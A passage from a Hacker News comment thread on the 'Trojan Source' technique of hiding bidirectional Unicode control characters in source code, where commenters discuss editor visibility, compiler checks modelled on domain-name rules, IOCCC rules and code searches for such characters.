| digits in numbers. But they are well-defined.
|
| - Only code points allowed by IDNA 2008 are allowed. This
| eliminates such things as the non-breaking zero width space,
| the expansion areas for future use, and such.
|
| The domain name people have been banging on this problem since
| 2003, and by now, there's a rough consensus of what to
| disallow. So start putting checks for that in compilers. If you
| find violations of those rules, it's more likely to be a typo
| than something useful, anyway.
|
| So that's a way out of this.
|
| [1] https://www.icann.org/en/system/files/files/draft-idn-
| guidel...
| varajelle wrote:
| > What's needed is to impose on programming languages,
| outside of comments, checks similar to the checks made for
| domain names.
|
| But this attack works by placing characters inside comments
| and srings. So these checks would not help preventing this
| particular attack.
| Animats wrote:
| They say that, but don't really justify that claim. That's
| more about string literals that do something other than
| just display, such as URLs.
| asddubs wrote:
| browsers have solved it for domain names. you could apply the
| same heuristics for not mixing e.g. cyrillic and non cyrillic
| in the same word/file
| a-dub wrote:
| wasn't there something a while back where people were triggering
| buffer overflows in terminal emulators with malicious (and
| invisible to the pretty printed eye) escape codes?
| banana_giraffe wrote:
| For anyone that wants to see the real code:
|
| https://gist.github.com/Q726kbXuN/3c978a63cb6de5168c017da4df...
|
| I've not seen one editor yet that doesn't at least hint there's a
| problem with syntax highlighting, if not just outright show
| nonsense.
| user2994cb wrote:
| I'm sure there are some creative uses in C-style comments for
| U+2215, Division Slash: /
| sqs wrote:
| Code search is helpful to see if any of your code contains these
| characters.
|
| A bunch of hits found across the top ~2M open-source
| repositories:
| https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...
|
| To triage, you probably want to first look at hits in code files
| (not JSON or Markdown, etc.):
|
| https://sourcegraph.com/search?q=context:global+%5Cx%7B202A%...
|
| You can set up a self-hosted instance of Sourcegraph to run this
| across all of your company's code: https://docs.sourcegraph.com/.
| mwcampbell wrote:
| > So you can use them in source code that appears innocuous to a
| human reviewer
|
| To a sighted human reviewer. If I'm not mistaken, a blind
| programmer using a screen reader would be immune to this trick.
| brazzy wrote:
| If the screen reader understands Bidi (which it needs to in
| order to support some languages), maybe not.
| afrcnc wrote:
| Duplicate: https://news.ycombinator.com/item?id=29061987
| Groxx wrote:
| Ehhhh... Interesting philosophically, and we might see a
| practical attack maybe eventually, but most source code editors
| and diff reviewers that I've encountered show all non-printable
| characters VERY visibly. Because they matter, and always have -
| "func asdf()" is very different from "func as<zwsp>df()". If I
| saw a pile of non-printable control characters intermixed in code
| in a diff, there's absolutely no way I'd allow that merge.
|
| IOCCC entries will absolutely become more fun though.
| lifthrasiir wrote:
| > IOCCC entries will absolutely become more fun though.
|
| IOCCC doesn't allow unescaped octets with high bit set [1], so
| even that's no go.
|
| [1] https://www.ioccc.org/2020/rules.txt (rule 13)
| GlitchMr wrote:
| Well, technically the rule only talks about entries that
| "fail to compile". An entry that still compiles is fine, see
| rule 12. In practice this means the Unicode abuse like this
| is only allowed in strings.
| lifthrasiir wrote:
| When the rule was originally introduced in 2001 [1] it was
| a total ban. It seems that the rule was slightly relaxed in
| 2013 [2], but I think it still massively discourages any
| octet >= 128 because there is no portable way to set the
| input encoding (like GCC `-finput-charset`, which is
| ignored by Clang AFAIK).
|
| [1] https://www.ioccc.org/2001/rules
|
| [2] https://www.ioccc.org/2013/rules.txt
| Groxx wrote:
| Aww. But also _of course_ they 've already addressed this.
| saagarjha wrote:
| I am very curious which program abused this and forced the
| creation of that rule.
| lifthrasiir wrote:
| Probably 2000/briddlebane [1]. But it is more like a guard
| against compatibility issues.
|
| [1] https://www.ioccc.org/2000/briddlebane.c vs.
| https://www.ioccc.org/2000/briddlebane.orig.c
| [deleted]
| Jach wrote:
| I wouldn't be so sure about visibility since it seems most code
| editors and programming languages want to support more unicode,
| not less... One of my hobbies used to be annually running a
| regex search through the company's millions of lines of java to
| see how much of an increase there was in non-printable spaces
| (0x200b) in java method names or other symbols. Eclipse at
| least wouldn't show them by default, I don't remember
| IntelliJ's behavior, but most people wouldn't know they were
| there. I was aware of only one time when it impacted someone
| who typed in a whole identifier by sight but the reference
| included a 200b and they were stuck for a bit figuring out why
| things didn't work.
|
| But I agree the trick (hard to call it an attack or even bug)
| is fun, in the same way as the earlier tricks of fake filename
| extensions. And terribly obvious, even with the limitations of
| default code viewers, and with no plausible deniability once
| caught, so it's pretty overblown for practical considerations.
| The intentionally introduced Linux kernel bugs from several
| months ago were far more significant a lesson for people to
| learn from, and they didn't rely on any unicode tricks but on
| much simpler tricks that were also somewhat plausibly deniable
| to chalk up to an oopsie.
| Groxx wrote:
| yeah, I've had an identifier or two like that in Ruby in the
| past :) always worth a few facepalm-riddled lols when sharing
| the final result with the rest of the team, especially since
| it often meant they copied the func from Stack Overflow or
| some equivalent.
|
| Most of what I've encountered though has been due to a _lack_
| of unicode support, and related growing pains in adopting
| full UTF-8. E.g. much of the Eclipse issues I saw were due to
| UTF-16 weirdness and stuff encoded in ShiftJIS or whatever
| flavor of Windows encoding you used, and all those garbled
| files due to missing magic-encoding-bytes in files. UTF-8
| support "completing" in tools largely cleaned all that up,
| since they detected the encoding, converted to UTF-8, and
| showed abnormal stuff as the abnormalities they were all
| along.
|
| I mean, that's probably because taking a deep look at
| supporting UTF-8 meant taking a deep look at many of their
| latent text bugs and finally fixing them, but it still
| happened around the same time, and "X editor now supports
| UTF-8" also marked a dramatic increase in "... and now shows
| <nbsp> explicitly!" and similar things.
| alanhaha wrote:
| Will this also fool formatter?
|
| Actually I think the format of the example in
| https://www.trojansource.codes/ is too strange that I would like
| committer to fix.
| littlestymaar wrote:
| Something puzzles me: this kind of tricks would definitely break
| syntax highlighting, wouldn't it?
| [deleted]
| sqs wrote:
| This issue has been raised before, such as at
| https://github.com/golang/go/issues/20209 (I was reminded of that
| by
| https://twitter.com/peter_szilagyi/status/145515080347229798...).
| There is some other interesting discussion there.
| dathinab wrote:
| I would say less that they discovered a new vulnerability but
| they they but needed focus on a long term known problem.
|
| It's just that many people while knowing the problem never
| considered that it could be used in supply chain attacks.
___________________________________________________________________
(page generated 2021-11-01 23:02 UTC)